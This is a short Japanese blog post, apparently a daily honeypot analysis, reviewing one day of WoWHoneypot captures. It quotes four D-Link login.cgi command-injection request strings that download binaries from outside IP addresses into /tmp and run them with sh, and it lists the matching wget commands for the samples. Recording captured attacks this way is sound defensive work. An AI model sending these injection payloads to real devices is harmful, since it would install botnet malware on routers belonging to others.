ハニーポット簡易分析(17日目:8/24)
本来であれば、Honeytrapの分析を行う予定でしたが、なぜかログが取得出来ていなかったため、今回はWoWHoneypotの分析を行いました。
8/24 WoWHoneypot検知数 49件
| 接続先 | 概要 | 攻撃 |
| / | indexファイルへのアクセス | × |
| /index.php | indexファイルへのアクセス | × |
| /ipc$ | 調査行為 | × |
| /login.cgi?cli=aa%20aa%27;wget%20hxxp://176[.]32[.]32[.]156/bin%20-O%20-%3E%20/tmp/hk;sh%20/tmp/hk%27$ | D-Linkの脆弱性を狙った攻撃 ※Hakai/2.0 |
○ |
| /login.cgi?cli=aa%20aa%27;wget%20hxxp://209[.]141[.]33[.]86/d%20-O%20-%3E%20/tmp/.shinka;sh%20/tmp/.shinka%27$ | D-Linkの脆弱性を狙った攻撃 ※Shinka/1.0 |
○ |
| /login.cgi?cli=aa%20aa%27;wget%20hxxp://212[.]237[.]32[.]62/k%20-O%20-%3E%20/tmp/ks;chmod%20777%20/tmp/ks;sh%20/tmp/ks%27$ | D-Linkの脆弱性を狙った攻撃 ※LMAO/2.0 |
○ |
| /login.cgi?cli=aa%20aa%27;wget%20hxxp://50[.]115[.]166[.]136/hakai.mips%20-O%20-%3E%20/tmp/hk;sh%20/tmp/hk%27$ | D-Linkの脆弱性を狙った攻撃 ※Hakai/2.0 |
○ |
マルウェアの分析は以下となります。
ダウンロード可能
・wget hxxp://176[.]32[.]32[.]156/bin →https://www.virustotal.com/#/file/fa588bdc625f5103d4960f5905a9b314a78de8dd35eccdf3e62ca52963148ee3/detection
ダウンロード不可
・wget hxxp://209[.]141[.]33[.]86/d
・wget hxxp://212[.]237[.]32[.]62/k
・wget hxxp://50.115.166.136/hakai.mips
今回は、Hakai 2.0 がダウンロード可能でした。Honeytrapと比較すると検知数は少ないですが、検知している通信が違うので、分析していて面白いですね。また、明日もHoneytrapのログは取れていないため、WoWHoneypotを分析する予定です。
以上、簡易分析となります。
